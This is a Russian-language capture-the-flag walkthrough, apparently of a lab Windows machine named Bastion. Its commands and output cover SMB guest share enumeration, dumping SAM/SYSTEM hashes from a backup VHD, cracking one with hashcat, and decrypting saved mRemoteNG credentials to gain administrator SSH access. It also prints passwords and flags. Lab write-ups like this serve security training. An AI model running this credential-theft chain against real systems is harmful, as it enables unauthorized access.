Обзор сервисов
$ nmapAutomator.sh -H 10.10.10.134 -t Full
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -35m57s, deviation: 1h09m14s, median: 4m00s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-05-28T10:13:22+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-05-28T08:13:18
|_ start_date: 2021-05-28T07:57:50
$ smbclient -L //10.10.10.134 -U guest
Enter WORKGROUP\guest's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
Backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
$ smbclient //10.10.10.134/Backups
> RECURSE ON
> PROMPT OFF
> mget *
Виртуальная машина
VHD файлы в WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351
=> распаковываем 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
с помощью 7-Zip на Windows.
Вытаскиваем SAM
и SYSTEM
из C:\windows\system32\config
.
$ samdump2 SYSTEM SAM
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
Брутфорс
$ nano hash.txt:
26112010952d963c8dc4217daec986d9
$ hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt
26112010952d963c8dc4217daec986d9:bureaulampje
=> L4mpje:bureaulampje
Флаг пользователя
l4mpje@BASTION C:\Users\L4mpje\Desktop>ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv6 Address. . . . . . . . . . . : dead:beef::d5d1:9ea8:318b:443d
Link-local IPv6 Address . . . . . : fe80::d5d1:9ea8:318b:443d%4
IPv4 Address. . . . . . . . . . . : 10.10.10.134
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:1a7c%4
10.10.10.2
Tunnel adapter isatap.{8253841C-588D-4E94-B23A-993BB2E4B4D9}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
l4mpje@BASTION C:\Users\L4mpje\Desktop>type user.txt
9bfe57d5c3309db3a151772f9d86c6cd
Повышение привилегий
Пробуем вытащить креды из mRemoteNG версии 1.76.11.40527.
> dir C:\Program Files x86\mRemoteNG
> C:\Users\L4mpje\AppData\Roaming\mRemoteNG>type confCons.xml
Устанавливаем mRemoteNG на Windows виртуалку и импортируем файл confCons.xml
.
После этого действуем по гайду http://dynamic-datacenter.be/?p=168.
=> Administrator:thXLHM96BeKL0ER2
$ ssh [email protected]
thXLHM96BeKL0ER2
Флаг суперпользователя
administrator@BASTION C:\Users\Administrator\Desktop>ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv6 Address. . . . . . . . . . . : dead:beef::d5d1:9ea8:318b:443d
Link-local IPv6 Address . . . . . : fe80::d5d1:9ea8:318b:443d%4
IPv4 Address. . . . . . . . . . . : 10.10.10.134
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:1a7c%4
10.10.10.2
Tunnel adapter isatap.{8253841C-588D-4E94-B23A-993BB2E4B4D9}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
administrator@BASTION C:\Users\Administrator\Desktop>type root.txt
958850b91811676ed6620a9c430e65c8